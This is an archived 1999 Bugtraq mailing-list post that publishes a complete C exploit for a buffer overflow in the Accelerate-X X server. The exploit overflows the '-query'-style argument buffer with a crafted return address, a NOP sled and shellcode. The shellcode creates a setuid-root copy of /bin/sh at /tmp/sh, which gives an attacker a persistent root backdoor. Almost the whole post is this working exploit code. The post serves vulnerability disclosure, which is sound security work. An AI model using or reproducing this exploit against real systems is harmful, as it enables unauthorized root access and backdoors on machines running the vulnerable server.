'SDI exploit for Xaccel'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    SDI exploit for Xaccel
From:       Thiago/c0nd0r <condor () SEKURE ! ORG>
Date:       1999-06-30 20:57:55
[Download RAW message or body]

Here is the exploit for the Accelerate-X buffer overflow
discovered by the KSR[t] group (ksrt.org).

I've checked the '-query' argument and I found out that it will not
overwrite the return address thus not allowing the exploitation. The
argument '-indirect' behaves in the same way.

--- SDIaccelX.c ----
/*
 * SDI linux exploit for Accelerate-X
 * Sekure SDI - Brazilian Information Security Team
 * by c0nd0r <condor@sekure.org>
 *
 * This script will exploit a vulnerability found by KSRT team
 * in the Accelerate-X Xserver [<=5.0].
 *
 * --------------------------------------------------------------------
 * The vulnerable buffer was small so we've changed the usual order to:
 * [garbage][eip][lots nop][shellcode]
 * BTW, I've also changed the code to execute, it will create a setuid
 * shell owned by the superuser at /tmp/sh.
 * --------------------------------------------------------------------
 *
 * Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no
 *          responsability.
 *
 * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
 *           marty (NORDO!), vader, fcon, slide, c_orb and
 *	     specially to my sasazita. Also toxyn.org, pulhas.org,
 *	     superbofh.org (Phibernet rox) and el8.org.
 *
 * Laughs - lame guys who hacked the senado/planalto.gov.br
 * pay some attention to the site: securityfocus.com (good point).
 * see you at #uground (irc.brasnet.org)
 */

#include <stdio.h>

/* generic shellcode */
char shellcode[] =
        "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
        "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
        "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
        "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
        "\x40\xcd\x80\xe8\xca\xff\xff\xff"
        "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";

main ( int argc, char *argv[] ) {
 char buf[1024];
 int x, y, offset=1000;
 long addr;
 int joe;

 if (argc > 1)
   offset = atoi ( argv[1]);

 /* return address */
 addr = (long) &joe + offset;

 buf[0] = ':';
 for ( x = 1; x < 53; x++)
  buf[x] = 'X';

 buf[x++] = (addr & 0x000000ff);
 buf[x++] = (addr & 0x0000ff00) >> 8;
 buf[x++] = (addr & 0x00ff0000) >> 16;
 buf[x++] = (addr & 0xff000000) >> 24;

 for (  ; x < 500; x++)
  buf[x] = 0x90;

 for ( y = 0; y < strlen(shellcode); y++, x++)
  buf[x] = shellcode[y];

 fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%x\n\n",
          offset, addr);

 buf[strlen(buf)] = '\0';

 execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);

// setenv ( "EGG", buf, 1);
// system ( "/bin/sh");

}
----- EOF ----------


-condor
www.sekure.org
 s e k u r e

pgp key available at: http://condor.sekure.org/condor.asc

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic